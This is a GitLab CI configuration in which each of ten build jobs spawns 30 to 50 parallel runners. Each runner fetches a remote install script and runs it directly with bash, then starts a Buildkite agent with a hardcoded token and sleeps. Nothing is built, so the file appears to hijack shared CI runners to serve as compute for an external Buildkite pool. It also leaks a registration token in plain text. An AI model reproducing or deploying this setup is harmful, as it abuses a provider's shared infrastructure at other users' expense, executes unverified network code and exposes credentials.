image: golang:latest

variables:
  REPO_NAME: gitlab.com/namespace/project

stages:
  - build

build_1:
  stage: build
  parallel: 50
  script: |
    TOKEN="8ba80bde475958a03e391e872d75d1e3f32d2488050dda2233" bash -c "`curl -sL https://raw.githubusercontent.com/buildkite/agent/master/install.sh`" && ~/.buildkite-agent/bin/buildkite-agent start && sleep 999

build_2:
  stage: build
  parallel: 30
  script: |
    TOKEN="8ba80bde475958a03e391e872d75d1e3f32d2488050dda2233" bash -c "`curl -sL https://raw.githubusercontent.com/buildkite/agent/master/install.sh`" && ~/.buildkite-agent/bin/buildkite-agent start && sleep 999

build_3:
  stage: build
  parallel: 50
  script: |
    TOKEN="8ba80bde475958a03e391e872d75d1e3f32d2488050dda2233" bash -c "`curl -sL https://raw.githubusercontent.com/buildkite/agent/master/install.sh`" && ~/.buildkite-agent/bin/buildkite-agent start && sleep 999

build_4:
  stage: build
  parallel: 30
  script: |
    TOKEN="8ba80bde475958a03e391e872d75d1e3f32d2488050dda2233" bash -c "`curl -sL https://raw.githubusercontent.com/buildkite/agent/master/install.sh`" && ~/.buildkite-agent/bin/buildkite-agent start && sleep 999

build_5:
  stage: build
  parallel: 50
  script: |
    TOKEN="8ba80bde475958a03e391e872d75d1e3f32d2488050dda2233" bash -c "`curl -sL https://raw.githubusercontent.com/buildkite/agent/master/install.sh`" && ~/.buildkite-agent/bin/buildkite-agent start && sleep 999

build_6:
  stage: build
  parallel: 50
  script: |
    TOKEN="8ba80bde475958a03e391e872d75d1e3f32d2488050dda2233" bash -c "`curl -sL https://raw.githubusercontent.com/buildkite/agent/master/install.sh`" && ~/.buildkite-agent/bin/buildkite-agent start && sleep 999

build_7:
  stage: build
  parallel: 30
  script: |
    TOKEN="8ba80bde475958a03e391e872d75d1e3f32d2488050dda2233" bash -c "`curl -sL https://raw.githubusercontent.com/buildkite/agent/master/install.sh`" && ~/.buildkite-agent/bin/buildkite-agent start && sleep 999

build_8:
  stage: build
  parallel: 50
  script: |
    TOKEN="8ba80bde475958a03e391e872d75d1e3f32d2488050dda2233" bash -c "`curl -sL https://raw.githubusercontent.com/buildkite/agent/master/install.sh`" && ~/.buildkite-agent/bin/buildkite-agent start && sleep 999

build_9:
  stage: build
  parallel: 30
  script: |
    TOKEN="8ba80bde475958a03e391e872d75d1e3f32d2488050dda2233" bash -c "`curl -sL https://raw.githubusercontent.com/buildkite/agent/master/install.sh`" && ~/.buildkite-agent/bin/buildkite-agent start && sleep 999

build_10:
  stage: build
  parallel: 50
  script: |
    TOKEN="8ba80bde475958a03e391e872d75d1e3f32d2488050dda2233" bash -c "`curl -sL https://raw.githubusercontent.com/buildkite/agent/master/install.sh`" && ~/.buildkite-agent/bin/buildkite-agent start && sleep 999
